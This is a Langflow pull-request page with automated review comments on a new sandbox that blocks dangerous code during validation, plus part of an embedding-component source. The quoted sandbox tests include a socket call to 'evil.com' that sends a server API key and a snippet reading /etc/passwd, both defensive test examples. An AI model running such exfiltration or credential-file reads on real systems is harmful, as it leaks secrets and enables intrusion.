feat(security): add configurable security levels for importing trusted builtins / modules#10696
feat(security): add configurable security levels for importing trusted builtins / modules#10696jordanrfrazier wants to merge 44 commits into
Conversation
|
Important Review skippedAuto incremental reviews are disabled on this repository. Please check the settings in the CodeRabbit UI or the You can disable this status message by setting the WalkthroughThis PR introduces a security sandbox for isolated Python code execution that blocks dangerous operations and modules by default, adds IBM watsonx.ai embedding model support with provider-specific configuration, and includes comprehensive security and integration tests. A new global setting controls whether dangerous code operations are permitted during validation. Changes
Sequence Diagram(s)sequenceDiagram
participant User as User Code
participant Val as validate.py
participant Sand as sandbox.py
participant Builtins as Isolated Builtins
participant Imports as Isolated Imports
User->>Val: compile code snippet
Val->>Val: create exec_globals
Val->>Sand: execute_in_sandbox(code_obj, exec_globals)
Sand->>Builtins: create_isolated_builtins()
Sand->>Imports: create_isolated_import()
note over Sand: Prepare isolated environment
Sand->>Sand: merge safe exec_globals
Sand->>Sand: set __builtins__ to isolated
Sand->>Sand: set __name__ and other attrs
rect rgba(255, 200, 0, 0.2)
note over Sand: Execute compiled code with isolation
Sand->>User: exec(code_obj, isolated_globals)
end
alt Code attempts dangerous operation
Builtins-->>Sand: raise SecurityViolation
Sand-->>Val: SecurityViolation caught
Val-->>User: validation fails
else Code is safe
User->>Imports: import langflow
Imports-->>User: allowed (in safe list)
Sand-->>Val: execution completes
Val-->>User: validation succeeds
end
sequenceDiagram
participant Client as Client Request
participant API as /api/v1/validate/code
participant Handler as Validation Handler
participant Sandbox as Sandbox Executor
participant Config as Settings
Client->>API: POST user_code
API->>Config: check allow_dangerous_code_validation
rect rgba(100, 200, 100, 0.2)
note over Config: Default: False (block dangerous)
end
API->>Handler: validate(code, dangerous_allowed=False)
Handler->>Handler: parse AST
Handler->>Sandbox: execute imports in sandbox
Handler->>Sandbox: execute functions in sandbox
alt Dangerous operation detected
rect rgba(255, 100, 100, 0.2)
Sandbox-->>Handler: SecurityViolation
Handler-->>API: 422 validation error
end
else Safe code
rect rgba(100, 200, 100, 0.2)
Sandbox-->>Handler: execution succeeds
Handler-->>API: 200 validation passed
end
end
API-->>Client: response
Estimated code review effort🎯 4 (Complex) | ⏱️ ~50 minutes Areas requiring extra attention:
Possibly related PRs
Suggested labels
Suggested reviewers
Pre-merge checks and finishing touches❌ Failed checks (1 error, 3 warnings)
✅ Passed checks (3 passed)
Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out. Comment |
Codecov Report❌ Patch coverage is ❌ Your project check has failed because the head coverage (40.47%) is below the target coverage (60.00%). You can increase the head coverage or adjust the target coverage. Additional details and impacted files@@ Coverage Diff @@
## main #10696 +/- ##
==========================================
- Coverage 33.38% 33.10% -0.28%
==========================================
Files 1399 1403 +4
Lines 66331 66470 +139
Branches 9794 9812 +18
==========================================
- Hits 22142 22003 -139
- Misses 43065 43336 +271
- Partials 1124 1131 +7
Flags with carried forward coverage won't be shown. Click here to find out more.
🚀 New features to boost your workflow:
|
There was a problem hiding this comment.
Actionable comments posted: 9
🧹 Nitpick comments (2)
src/lfx/src/lfx/custom/validate.py (1)
74-85: Function definition now executed in sandbox — verify expectations for decorator/default‑arg errorsExecuting each
FunctionDefviaexecute_in_sandboxwith_create_langflow_execution_context()is a good way to catch definition‑time errors (decorators, default args, annotations) without exposing server state. Just be aware this will also surfaceSecurityViolation(e.g., if decorators/imports inside the function hit blocked modules) through the genericexcept Exceptionpath and report them asfunction["errors"]. Confirm that this mapping and logging ("Error executing function code") matches what the validate API and UI expect for blocked operations vs regular runtime errors.src/backend/tests/unit/api/v1/test_validate.py (1)
183-209: Clean up W293 blank lines in docstrings for third‑party‑libs test.Ruff reports
W293 Blank line contains whitespaceat line 184. That’s the empty line inside this docstring:"""Test that third-party libraries (not in a whitelist) can be imported. Users should be able to import legitimate third-party libraries like AI libraries, ... """You can fix it by removing the blank line or making it non‑blank:
- """Test that third-party libraries (not in a whitelist) can be imported. - - Users should be able to import legitimate third-party libraries like AI libraries, + """Test that third-party libraries (not in a whitelist) can be imported. + Users should be able to import legitimate third-party libraries like AI libraries,Same pattern applies to the docstrings around Lines 252 and 280; see next comment.
📜 Review details
Configuration used: Path: .coderabbit.yaml
Review profile: CHILL
Plan: Pro
⛔ Files ignored due to path filters (1)
uv.lockis excluded by!**/*.lock
📒 Files selected for processing (7)
src/backend/tests/unit/api/v1/test_validate.py(1 hunks)src/backend/tests/unit/utils/test_validate.py(1 hunks)src/lfx/src/lfx/custom/sandbox.py(1 hunks)src/lfx/src/lfx/custom/validate.py(2 hunks)src/lfx/src/lfx/services/settings/base.py(1 hunks)src/lfx/tests/unit/custom/test_sandbox_isolation.py(1 hunks)src/lfx/tests/unit/custom/test_sandbox_security.py(1 hunks)
🧰 Additional context used
🧬 Code graph analysis (5)
src/lfx/src/lfx/custom/validate.py (1)
src/lfx/src/lfx/custom/sandbox.py (3)
create_isolated_import(140-173)execute_in_sandbox(176-239)isolated_import(149-171)
src/lfx/src/lfx/custom/sandbox.py (1)
src/backend/base/langflow/interface/importing/utils.py (1)
import_module(7-32)
src/lfx/tests/unit/custom/test_sandbox_isolation.py (1)
src/lfx/src/lfx/custom/sandbox.py (1)
execute_in_sandbox(176-239)
src/lfx/tests/unit/custom/test_sandbox_security.py (1)
src/lfx/src/lfx/custom/sandbox.py (1)
execute_in_sandbox(176-239)
src/backend/tests/unit/api/v1/test_validate.py (1)
src/backend/tests/conftest.py (1)
logged_in_headers(507-513)
🪛 GitHub Actions: Ruff Style Check
src/backend/tests/unit/api/v1/test_validate.py
[error] 101-101: Ruff: E501 Line too long (131 > 120). Line exceeds maximum line length.
🪛 GitHub Check: Ruff Style Check (3.13)
src/lfx/src/lfx/custom/sandbox.py
[failure] 16-16: Ruff (N818)
src/lfx/src/lfx/custom/sandbox.py:16:7: N818 Exception name SecurityViolation should be named with an Error suffix
[failure] 13-13: Ruff (UP035)
src/lfx/src/lfx/custom/sandbox.py:13:1: UP035 typing.Set is deprecated, use set instead
[failure] 13-13: Ruff (UP035)
src/lfx/src/lfx/custom/sandbox.py:13:1: UP035 typing.Dict is deprecated, use dict instead
src/backend/tests/unit/api/v1/test_validate.py
[failure] 280-280: Ruff (W293)
src/backend/tests/unit/api/v1/test_validate.py:280:1: W293 Blank line contains whitespace
[failure] 268-268: Ruff (E501)
src/backend/tests/unit/api/v1/test_validate.py:268:121: E501 Line too long (127 > 120)
[failure] 252-252: Ruff (W293)
src/backend/tests/unit/api/v1/test_validate.py:252:1: W293 Blank line contains whitespace
[failure] 184-184: Ruff (W293)
src/backend/tests/unit/api/v1/test_validate.py:184:1: W293 Blank line contains whitespace
[failure] 134-134: Ruff (F841)
src/backend/tests/unit/api/v1/test_validate.py:134:5: F841 Local variable result is assigned to but never used
[failure] 133-133: Ruff (E501)
src/backend/tests/unit/api/v1/test_validate.py:133:121: E501 Line too long (121 > 120)
[failure] 101-101: Ruff (E501)
src/backend/tests/unit/api/v1/test_validate.py:101:121: E501 Line too long (131 > 120)
🪛 Gitleaks (8.29.0)
src/lfx/tests/unit/custom/test_sandbox_security.py
[high] 30-30: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.
(generic-api-key)
[high] 66-66: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.
(generic-api-key)
⏰ Context from checks skipped due to timeout of 90000ms. You can increase the timeout in your CodeRabbit configuration to a maximum of 15 minutes (900000ms). (13)
- GitHub Check: Lint Backend / Run Mypy (3.13)
- GitHub Check: Lint Backend / Run Mypy (3.10)
- GitHub Check: Lint Backend / Run Mypy (3.11)
- GitHub Check: Lint Backend / Run Mypy (3.12)
- GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 5
- GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 4
- GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 1
- GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 2
- GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 3
- GitHub Check: Run Backend Tests / Integration Tests - Python 3.10
- GitHub Check: Run Backend Tests / LFX Tests - Python 3.10
- GitHub Check: Test Starter Templates
- GitHub Check: Update Component Index
🔇 Additional comments (2)
src/backend/tests/unit/utils/test_validate.py (1)
70-76: Typed function example looks consistent with sandboxed validationUsing
from typing import List, Optionalplusjson/mathinsideprocess_dataaligns with_create_langflow_execution_context(which seedsList/Optionalintoexec_globals), so annotation evaluation and import checks should pass without introducing new edge cases.src/lfx/src/lfx/services/settings/base.py (1)
339-349: Config flag aligns with sandbox env var; verify it’s actually wired throughAdding
allow_dangerous_code_validation: bool = Falsewith theLANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATIONenv mapping is consistent with the sandbox’s documented toggle. However, the sandbox currently appears to read the env var directly, while this Settings field is not obviously used to driveALLOW_DANGEROUS_CODE. Please confirm that:
- Setting this field (or the env var) actually affects the sandbox behavior used by
/api/v1/validate/code, and- There’s no divergence between the value in
Settingsand the value the sandbox module uses at import time.
| # Simulate server secrets stored in Python variables | ||
| server_api_key = "sk-secret-key-12345" | ||
| server_db_password = "db_password_secret" | ||
| server_config = { | ||
| "api_key": server_api_key, | ||
| "database_url": "postgresql://user:password@localhost/db" | ||
| } | ||
|
|
There was a problem hiding this comment.
Hard‑coded “API key”‑like test strings will keep tripping secret scanners
Strings like "sk-secret-key-12345", "sk-secret-12345", and "sk-secret-key-to-exfiltrate" look like real API keys to tools such as gitleaks, which is already flagging them. Even though they’re harmless test values, they’ll continue to generate noise or block CI unless suppressed.
A low‑friction fix is to tweak them so they no longer match common key patterns, e.g.:
"sk-test-not-a-real-key-12345""dummy-secret-key"
or similar, or centralize them in a constant that scanners are configured to ignore.
Also applies to: 64-69, 100-102, 144-145, 175-177, 229-231
🧰 Tools
🪛 Gitleaks (8.29.0)
[high] 30-30: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.
(generic-api-key)
There was a problem hiding this comment.
Actionable comments posted: 9
Caution
Some comments are outside the diff and can’t be posted inline due to platform limitations.
⚠️ Outside diff range comments (1)
src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json (1)
2338-2355: Unsafe default: Allow Dangerous Deserialization is enabled.Defaulting allow_dangerous_deserialization to true can lead to arbitrary code execution when loading FAISS indexes. For a starter template, ship it disabled.
- BoolInput( - name="allow_dangerous_deserialization", - display_name="Allow Dangerous Deserialization", - ... - value=True, - ), + BoolInput( + name="allow_dangerous_deserialization", + display_name="Allow Dangerous Deserialization", + ... + value=False, + ),If you must load untrusted indexes, gate with environment flag and warn prominently in UI.
🧹 Nitpick comments (6)
src/backend/tests/unit/utils/test_validate.py (1)
54-151: Consider adding dedicated sandbox security tests.The PR introduces a security sandbox to block dangerous operations, but this test file doesn't appear to include tests that specifically verify sandbox blocking behavior. Consider adding tests for:
Blocked operations - Verify that dangerous operations are blocked:
- File system access (
open(),os.remove(),os.system())- Subprocess execution (
subprocess.run(),os.popen())- Network operations (
socket,urllib,requests)- Module imports (
__import__,importlibwith dangerous modules)Allowed operations - Verify safe operations still work:
- Standard math/string operations
- Safe stdlib modules (math, json, typing, etc.)
Global setting - The AI summary mentions "a new global setting controls whether dangerous code operations are permitted during validation." Add tests to verify:
- Setting can enable/disable dangerous operations
- Setting is respected by validation logic
Error handling - Verify appropriate errors are raised when blocked operations are attempted
Example test structure:
class TestSandboxSecurity: """Test cases for sandbox security restrictions.""" def test_blocks_file_operations(self): """Test that file operations are blocked in sandbox.""" code = ''' def dangerous_func(): with open('/etc/passwd', 'r') as f: return f.read() ''' result = validate_code(code) assert len(result["function"]["errors"]) > 0 assert "blocked" in str(result["function"]["errors"]).lower() or "not allowed" in str(result["function"]["errors"]).lower() def test_allows_safe_operations(self): """Test that safe operations are allowed.""" code = ''' import math import json def safe_func(x): return json.dumps({"result": math.sqrt(x)}) ''' result = validate_code(code) assert result["imports"]["errors"] == [] assert result["function"]["errors"] == []src/lfx/src/lfx/services/settings/base.py (1)
339-349: Config flag wiring for dangerous validation looks consistentThe new
allow_dangerous_code_validationflag is sane: defaulting toFalse, clearly documented, and aligned withenv_prefix="LANGFLOW_"soLANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATIONworks as described. One thing to be aware of: the sandbox currently reads this env var once at import time, so changing this setting at runtime viaSettingswon’t affectALLOW_DANGEROUS_CODEwithout a restart. If you expect dynamic toggling, wiring the sandbox flag throughSettings(or re-reading on demand) would help, otherwise this behavior is fine as a static boot‑time switch.src/lfx/tests/unit/custom/test_sandbox_security.py (3)
3-13: Clarify relationship between namespace isolation and dangerous‑code flagThe module docstring currently states that sandboxed code can access filesystem, env, network, and commands without qualification, but
execute_in_sandboxis documented as blocking these by default unlessLANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=trueis set. It would be clearer (and less misleading for future readers) to explicitly mention that this “CAN access” behavior assumes the dangerous‑code flag is enabled, and that by default those operations are blocked while namespace isolation still applies.
217-237: Avoid real outbound network connections in testsIn
test_sandbox_cannot_exfiltrate_secrets_via_network, the sandboxed code calls:s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('evil.com', 1337)) s.send(server_api_key.encode())Even though you intend a
NameErroronserver_api_key, thesocket.connecthappens before that lookup, so the test will attempt a real outbound TCP connection toevil.com. This can make tests slow, flaky, or surprising in constrained CI environments.You can keep the exfiltration intent while avoiding actual network calls by reordering or simplifying:
-def test(): - # Code CAN make network requests - # But code CANNOT access server_api_key to send - # If isolation is broken, we could do: socket.send(server_api_key.encode()) - s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - s.connect(('evil.com', 1337)) - s.send(server_api_key.encode()) # Try to send server secret - s.close() - return 'sent' +def test(): + # Code COULD make network requests, but here we focus on the secret access. + # The NameError on server_api_key should occur before any actual network I/O. + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + # No real connect; just reference the would‑be secret. + s.send(server_api_key.encode()) # Try to send server secret + s.close() + return 'sent'This still proves that sandboxed code cannot obtain
server_api_key, without touching the network.
252-285: Test name/docstring don’t match behavior intest_sandbox_cannot_access_imported_server_modules_stateThe test name and docstring say it verifies that sandboxed code “gets fresh module instances, not server’s module state”, but the inline comments and assertion now acknowledge that
jsonis actually shared and only check thatresultis astr. As written, the test does not meaningfully validate isolation of imported module state.Either:
- Align the behavior with the name/docstring, e.g. assert that
resultreflects unmodifiedjson.dumps, or- Rename the test and update comments to describe the actual property you care about (e.g., “sandbox can import and use json even if server mutates it; isolation is about Python variables, not module state”), and simplify the setup.
Cleaning this up will make the security guarantees and limitations around module‑level state much clearer for future maintainers.
src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json (1)
2231-2249: Guardrail: validate truncate_input_tokens before passing to SDK.Prevent invalid/negative values from reaching the IBM params.
Within build_embeddings IBM branch:
- params = { - EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS: self.truncate_input_tokens, + safe_trunc = max(0, int(self.truncate_input_tokens or 0)) + params = { + EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS: safe_trunc, EmbedTextParamsMetaNames.RETURN_OPTIONS: {"input_text": self.input_text}, }
📜 Review details
Configuration used: Path: .coderabbit.yaml
Review profile: CHILL
Plan: Pro
⛔ Files ignored due to path filters (1)
uv.lockis excluded by!**/*.lock
📒 Files selected for processing (8)
src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json(5 hunks)src/backend/tests/unit/api/v1/test_validate.py(1 hunks)src/backend/tests/unit/utils/test_validate.py(1 hunks)src/lfx/src/lfx/custom/sandbox.py(1 hunks)src/lfx/src/lfx/custom/validate.py(2 hunks)src/lfx/src/lfx/services/settings/base.py(1 hunks)src/lfx/tests/unit/custom/test_sandbox_isolation.py(1 hunks)src/lfx/tests/unit/custom/test_sandbox_security.py(1 hunks)
🧰 Additional context used
🧬 Code graph analysis (3)
src/lfx/tests/unit/custom/test_sandbox_isolation.py (1)
src/lfx/src/lfx/custom/sandbox.py (1)
execute_in_sandbox(179-242)
src/lfx/tests/unit/custom/test_sandbox_security.py (1)
src/lfx/src/lfx/custom/sandbox.py (1)
execute_in_sandbox(179-242)
src/lfx/src/lfx/custom/validate.py (1)
src/lfx/src/lfx/custom/sandbox.py (3)
create_isolated_import(142-176)execute_in_sandbox(179-242)isolated_import(152-174)
🪛 GitHub Actions: Ruff Style Check
src/backend/tests/unit/api/v1/test_validate.py
[error] 139-139: F841 Local variable result is assigned to but never used.
🪛 GitHub Check: Ruff Style Check (3.13)
src/backend/tests/unit/api/v1/test_validate.py
[failure] 139-139: Ruff (F841)
src/backend/tests/unit/api/v1/test_validate.py:139:5: F841 Local variable result is assigned to but never used
src/lfx/src/lfx/custom/sandbox.py
[failure] 161-162: Ruff (EM102)
src/lfx/src/lfx/custom/sandbox.py:161:21: EM102 Exception must not use an f-string literal, assign to variable first
[failure] 160-163: Ruff (TRY003)
src/lfx/src/lfx/custom/sandbox.py:160:23: TRY003 Avoid specifying long messages outside the exception class
[failure] 135-135: Ruff (EM102)
src/lfx/src/lfx/custom/sandbox.py:135:34: EM102 Exception must not use an f-string literal, assign to variable first
[failure] 135-135: Ruff (TRY003)
src/lfx/src/lfx/custom/sandbox.py:135:19: TRY003 Avoid specifying long messages outside the exception class
[failure] 129-129: Ruff (E501)
src/lfx/src/lfx/custom/sandbox.py:129:121: E501 Line too long (121 > 120)
[failure] 129-129: Ruff (EM102)
src/lfx/src/lfx/custom/sandbox.py:129:21: EM102 Exception must not use an f-string literal, assign to variable first
[failure] 128-130: Ruff (TRY003)
src/lfx/src/lfx/custom/sandbox.py:128:23: TRY003 Avoid specifying long messages outside the exception class
[failure] 105-108: Ruff (SIM105)
src/lfx/src/lfx/custom/sandbox.py:105:13: SIM105 Use contextlib.suppress(AttributeError) instead of try-except-pass
[failure] 17-17: Ruff (N818)
src/lfx/src/lfx/custom/sandbox.py:17:7: N818 Exception name SecurityViolation should be named with an Error suffix
🪛 Gitleaks (8.29.0)
src/lfx/tests/unit/custom/test_sandbox_security.py
[high] 29-29: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.
(generic-api-key)
[high] 63-63: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.
(generic-api-key)
⏰ Context from checks skipped due to timeout of 90000ms. You can increase the timeout in your CodeRabbit configuration to a maximum of 15 minutes (900000ms). (4)
- GitHub Check: Run Frontend Tests / Playwright Tests - Shard 27/40
- GitHub Check: Test Docker Images / Test docker images
- GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 1
- GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 4
🔇 Additional comments (4)
src/backend/tests/unit/utils/test_validate.py (1)
70-75: I need to examine the actual tests in the file to understand their context and expectations.Now I need to examine the actual test file structure to determine if the change is part of a broader, consistent update or if there's genuinely an inconsistency.
Based on the shell script output and web search, I have sufficient evidence. The output shows that Langflow is a powerful platform for building and deploying AI-powered agents and workflows, and the sandbox implementation with blocking of dangerous operations by default is confirmed. Let me generate the rewritten review comment.
Clarify test coverage inconsistency and file path.
The script output confirms that the sandbox implementation blocks dangerous operations (file I/O, network, subprocess) by default, with an environment variable
LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATIONavailable to override this behavior.However, I cannot locate the specific file path
src/backend/tests/unit/utils/test_validate.pyin the sandbox-related test results. The script output shows comprehensive sandbox tests atsrc/lfx/tests/unit/custom/test_sandbox_security.pyandsrc/lfx/tests/unit/custom/test_sandbox_isolation.py, plus API endpoint tests atsrc/backend/tests/unit/api/v1/test_validate.py.The tests at
src/backend/tests/unit/api/v1/test_validate.py(lines 84, 108) explicitly verify that dangerous operations ARE blocked by default, which aligns with the change at lines 70-75 to use safe imports. If tests at other line ranges in a utils test file still referenceos/syswithout apparent sandbox restrictions, they may be:
- Testing exception scenarios where blocking is expected
- Running under an environment with the override flag enabled
- Testing different code paths than the validate endpoint
Please confirm:
- Is the file path
src/backend/tests/unit/utils/test_validate.pycorrect, or has it been reorganized?- What do tests at lines 126-134, 270-276, 501-510 verify—sandbox blocking behavior or success cases?
src/lfx/src/lfx/custom/validate.py (1)
11-12: Sandbox integration invalidate_codelooks solidUsing
create_isolated_importfor bothast.Importandast.ImportFromand then running eachFunctionDefthroughexecute_in_sandboxwith a constrained Langflow execution context gives you:
- Blocked dangerous modules at import time ( surfaced as structured import errors ),
- Definition‑time evaluation (decorators / default args) inside the sandbox, and
- No leakage of server globals or real
__builtins__into user code.The
_create_langflow_execution_contextfallback stubs also keep validation robust when optional Langflow modules aren’t importable. Overall this wiring matches the intended security model of the/validate/codeendpoint and looks correct.Also applies to: 51-88, 93-150
src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json (2)
2018-2019: All IBM SDK and LangChain‑IBM signatures verified as correct.The web search confirms that your code correctly uses:
- Credentials(api_key=..., url=...) with ibm_watsonx_ai 1.4.x
- EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS and RETURN_OPTIONS.input_text for text embedding parameters
- WatsonxEmbeddings with model_id, params, watsonx_client (pre-built APIClient), and project_id in langchain-ibm 0.3.19
All parameters and signatures match the documented patterns for the versions pinned in your dependencies.
1859-1866: Dependency versions verified and consistent.Verification confirms all declared versions (requests 2.32.5, ibm_watsonx_ai 1.4.2, langchain_ibm 0.3.19) are:
- Properly pinned in the JSON starter project configuration
- Consistent with pyproject.toml constraints (requests>=2.32.0, ibm-watsonx-ai>=1.3.1,<2.0.0, langchain-ibm>=0.3.8)
- Mutually compatible with no conflicts detected
- Compatible with project's Python requirement (>=3.10,<3.14)
| "value": "from typing import Any\n\nimport requests\nfrom ibm_watsonx_ai.metanames import EmbedTextParamsMetaNames\nfrom langchain_openai import OpenAIEmbeddings\n\nfrom lfx.base.embeddings.model import LCEmbeddingsModel\nfrom lfx.base.models.model_utils import get_ollama_models, is_valid_ollama_url\nfrom lfx.base.models.openai_constants import OPENAI_EMBEDDING_MODEL_NAMES\nfrom lfx.base.models.watsonx_constants import (\n IBM_WATSONX_URLS,\n WATSONX_EMBEDDING_MODEL_NAMES,\n)\nfrom lfx.field_typing import Embeddings\nfrom lfx.io import (\n BoolInput,\n DictInput,\n DropdownInput,\n FloatInput,\n IntInput,\n MessageTextInput,\n SecretStrInput,\n)\nfrom lfx.log.logger import logger\nfrom lfx.schema.dotdict import dotdict\nfrom lfx.utils.util import transform_localhost_url\n\n# Ollama API constants\nHTTP_STATUS_OK = 200\nJSON_MODELS_KEY = \"models\"\nJSON_NAME_KEY = \"name\"\nJSON_CAPABILITIES_KEY = \"capabilities\"\nDESIRED_CAPABILITY = \"embedding\"\nDEFAULT_OLLAMA_URL = \"http://localhost:11434\"\n\n\nclass EmbeddingModelComponent(LCEmbeddingsModel):\n display_name = \"Embedding Model\"\n description = \"Generate embeddings using a specified provider.\"\n documentation: str = \"https://docs.langflow.org/components-embedding-models\"\n icon = \"binary\"\n name = \"EmbeddingModel\"\n category = \"models\"\n\n inputs = [\n DropdownInput(\n name=\"provider\",\n display_name=\"Model Provider\",\n options=[\"OpenAI\", \"Ollama\", \"IBM watsonx.ai\"],\n value=\"OpenAI\",\n info=\"Select the embedding model provider\",\n real_time_refresh=True,\n options_metadata=[{\"icon\": \"OpenAI\"}, {\"icon\": \"Ollama\"}, {\"icon\": \"WatsonxAI\"}],\n ),\n MessageTextInput(\n name=\"api_base\",\n display_name=\"API Base URL\",\n info=\"Base URL for the API. Leave empty for default.\",\n advanced=True,\n ),\n MessageTextInput(\n name=\"ollama_base_url\",\n display_name=\"Ollama API URL\",\n info=f\"Endpoint of the Ollama API (Ollama only). Defaults to {DEFAULT_OLLAMA_URL}\",\n value=DEFAULT_OLLAMA_URL,\n show=False,\n real_time_refresh=True,\n load_from_db=True,\n ),\n DropdownInput(\n name=\"base_url_ibm_watsonx\",\n display_name=\"watsonx API Endpoint\",\n info=\"The base URL of the API (IBM watsonx.ai only)\",\n options=IBM_WATSONX_URLS,\n value=IBM_WATSONX_URLS[0],\n show=False,\n real_time_refresh=True,\n ),\n DropdownInput(\n name=\"model\",\n display_name=\"Model Name\",\n options=OPENAI_EMBEDDING_MODEL_NAMES,\n value=OPENAI_EMBEDDING_MODEL_NAMES[0],\n info=\"Select the embedding model to use\",\n real_time_refresh=True,\n refresh_button=True,\n ),\n SecretStrInput(\n name=\"api_key\",\n display_name=\"OpenAI API Key\",\n info=\"Model Provider API key\",\n required=True,\n show=True,\n real_time_refresh=True,\n ),\n # Watson-specific inputs\n MessageTextInput(\n name=\"project_id\",\n display_name=\"Project ID\",\n info=\"IBM watsonx.ai Project ID (required for IBM watsonx.ai)\",\n show=False,\n ),\n IntInput(\n name=\"dimensions\",\n display_name=\"Dimensions\",\n info=\"The number of dimensions the resulting output embeddings should have. \"\n \"Only supported by certain models.\",\n advanced=True,\n ),\n IntInput(name=\"chunk_size\", display_name=\"Chunk Size\", advanced=True, value=1000),\n FloatInput(name=\"request_timeout\", display_name=\"Request Timeout\", advanced=True),\n IntInput(name=\"max_retries\", display_name=\"Max Retries\", advanced=True, value=3),\n BoolInput(name=\"show_progress_bar\", display_name=\"Show Progress Bar\", advanced=True),\n DictInput(\n name=\"model_kwargs\",\n display_name=\"Model Kwargs\",\n advanced=True,\n info=\"Additional keyword arguments to pass to the model.\",\n ),\n IntInput(\n name=\"truncate_input_tokens\",\n display_name=\"Truncate Input Tokens\",\n advanced=True,\n value=200,\n show=False,\n ),\n BoolInput(\n name=\"input_text\",\n display_name=\"Include the original text in the output\",\n value=True,\n advanced=True,\n show=False,\n ),\n ]\n\n @staticmethod\n def fetch_ibm_models(base_url: str) -> list[str]:\n \"\"\"Fetch available models from the watsonx.ai API.\"\"\"\n try:\n endpoint = f\"{base_url}/ml/v1/foundation_model_specs\"\n params = {\n \"version\": \"2024-09-16\",\n \"filters\": \"function_embedding,!lifecycle_withdrawn:and\",\n }\n response = requests.get(endpoint, params=params, timeout=10)\n response.raise_for_status()\n data = response.json()\n models = [model[\"model_id\"] for model in data.get(\"resources\", [])]\n return sorted(models)\n except Exception: # noqa: BLE001\n logger.exception(\"Error fetching models\")\n return WATSONX_EMBEDDING_MODEL_NAMES\n\n def build_embeddings(self) -> Embeddings:\n provider = self.provider\n model = self.model\n api_key = self.api_key\n api_base = self.api_base\n base_url_ibm_watsonx = self.base_url_ibm_watsonx\n ollama_base_url = self.ollama_base_url\n dimensions = self.dimensions\n chunk_size = self.chunk_size\n request_timeout = self.request_timeout\n max_retries = self.max_retries\n show_progress_bar = self.show_progress_bar\n model_kwargs = self.model_kwargs or {}\n\n if provider == \"OpenAI\":\n if not api_key:\n msg = \"OpenAI API key is required when using OpenAI provider\"\n raise ValueError(msg)\n return OpenAIEmbeddings(\n model=model,\n dimensions=dimensions or None,\n base_url=api_base or None,\n api_key=api_key,\n chunk_size=chunk_size,\n max_retries=max_retries,\n timeout=request_timeout or None,\n show_progress_bar=show_progress_bar,\n model_kwargs=model_kwargs,\n )\n\n if provider == \"Ollama\":\n try:\n from langchain_ollama import OllamaEmbeddings\n except ImportError:\n try:\n from langchain_community.embeddings import OllamaEmbeddings\n except ImportError:\n msg = \"Please install langchain-ollama: pip install langchain-ollama\"\n raise ImportError(msg) from None\n\n transformed_base_url = transform_localhost_url(ollama_base_url)\n\n # Check if URL contains /v1 suffix (OpenAI-compatible mode)\n if transformed_base_url and transformed_base_url.rstrip(\"/\").endswith(\"/v1\"):\n # Strip /v1 suffix and log warning\n transformed_base_url = transformed_base_url.rstrip(\"/\").removesuffix(\"/v1\")\n logger.warning(\n \"Detected '/v1' suffix in base URL. The Ollama component uses the native Ollama API, \"\n \"not the OpenAI-compatible API. The '/v1' suffix has been automatically removed. \"\n \"If you want to use the OpenAI-compatible API, please use the OpenAI component instead. \"\n \"Learn more at https://docs.ollama.com/openai#openai-compatibility\"\n )\n\n return OllamaEmbeddings(\n model=model,\n base_url=transformed_base_url or \"http://localhost:11434\",\n **model_kwargs,\n )\n\n if provider == \"IBM watsonx.ai\":\n try:\n from langchain_ibm import WatsonxEmbeddings\n except ImportError:\n msg = \"Please install langchain-ibm: pip install langchain-ibm\"\n raise ImportError(msg) from None\n\n if not api_key:\n msg = \"IBM watsonx.ai API key is required when using IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n project_id = self.project_id\n\n if not project_id:\n msg = \"Project ID is required for IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n from ibm_watsonx_ai import APIClient, Credentials\n\n credentials = Credentials(\n api_key=self.api_key,\n url=base_url_ibm_watsonx or \"https://us-south.ml.cloud.ibm.com\",\n )\n\n api_client = APIClient(credentials)\n\n params = {\n EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS: self.truncate_input_tokens,\n EmbedTextParamsMetaNames.RETURN_OPTIONS: {\"input_text\": self.input_text},\n }\n\n return WatsonxEmbeddings(\n model_id=model,\n params=params,\n watsonx_client=api_client,\n project_id=project_id,\n )\n\n msg = f\"Unknown provider: {provider}\"\n raise ValueError(msg)\n\n async def update_build_config(\n self, build_config: dotdict, field_value: Any, field_name: str | None = None\n ) -> dotdict:\n if field_name == \"provider\":\n if field_value == \"OpenAI\":\n build_config[\"model\"][\"options\"] = OPENAI_EMBEDDING_MODEL_NAMES\n build_config[\"model\"][\"value\"] = OPENAI_EMBEDDING_MODEL_NAMES[0]\n build_config[\"api_key\"][\"display_name\"] = \"OpenAI API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"display_name\"] = \"OpenAI API Base URL\"\n build_config[\"api_base\"][\"advanced\"] = True\n build_config[\"api_base\"][\"show\"] = True\n build_config[\"ollama_base_url\"][\"show\"] = False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] 